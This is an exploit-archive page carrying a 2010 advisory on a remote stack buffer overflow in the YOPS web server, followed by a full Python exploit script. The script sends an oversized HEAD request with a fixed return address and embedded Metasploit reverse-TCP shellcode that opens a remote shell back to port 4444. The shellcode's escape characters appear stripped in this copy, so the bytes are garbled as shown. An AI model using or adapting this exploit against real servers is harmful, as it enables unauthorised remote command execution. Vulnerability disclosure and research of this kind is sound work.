[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : YOPS Web Server Remote Command Execution
# Published : 2010-09-11
# Author : Rodrigo Escobar
# Previous Title : Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit
# Next Title : IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability
[DCA-00015]
[Software]
- YOPS (Your Open Personal [WEB] Server)
[Vendor Product Description]
- YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C. There are 7 stages (accept, parse,
launch, fetch, error, send and log), and pipes are used as interstage
channels.
[Bug Description]
- In function http_parse_request_header the application fails to do a
boundary check for a malformed buffer received as a HTTP command
(HEAD/GET/POST), prior to use it as input for logger variable at
swebs_record_log function.
--- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
int r;
int ver, rev;
char *s, *tok, *l, *prm;
[...]
r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
if (r != 2)
return -400;
[...]
}
--- END snippet ---
--- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
int err;
time_t now;
char timestr[32];
char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
sprintf (
logrec,
"%st[%s]t"%s"t(%d+%d/%d)t%d",
job->client,
timestr,
job->hdr.request_line,
job->response_hlen,
job->response_blen_sent,
job->response_blen,
job->status
);
[...]
}
--- END snippet ---
[History]
- Advisory sent to vendor on 08/26/2010
[Impact]
- High (Remote Command Execution)
[Affected Version]
- YOPS 2009-11-30
- Prior versions may also be vulnerable
[Code]
#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br
HOST = "localhost"
PORT = 8888
import socket
import sys
import time
try:
BUFF_LEN = int(sys.argv[1])
except:
BUFF_LEN = 802
FIXUP_ADDR = "x47xcex04x08"
shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
"x33xc9xb1x13xbexaex88x55xcbxdaxcdxd9x74x24xf4"
"x5fx31x77x0ex03x77x0ex83x69x8cxb7x3ex44x56xc0"
"x22xf5x2bx7cxcfxfbx22x63xbfx9dxf9xe4x9bx3fx6a"
"x9ax1bxbfx6bx02x74xaex37xacxd7xbaxd7x61x88xb3"
"x39xc2x42xa5xe1x08x12x70x95x4axa3xbdx54xecx8d"
"xb8x9fxbdx65x15x4fx4dx1ex01xa0xd3xb7xbfx37xf0"
"x18x6cxc1x16x28x99x1cx58x43"
)
buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"
stackadjust = (
"xcb" # instruction alignment
"xbcx69x69x96xb0" # Stack Adjustment
)
payload = buffer + stackadjust + shellcode + "rnrn"
print """
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""
print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1rnrn")
try:
s.recv(1024)
except:
pass
s.close()
time.sleep(3)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()
--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br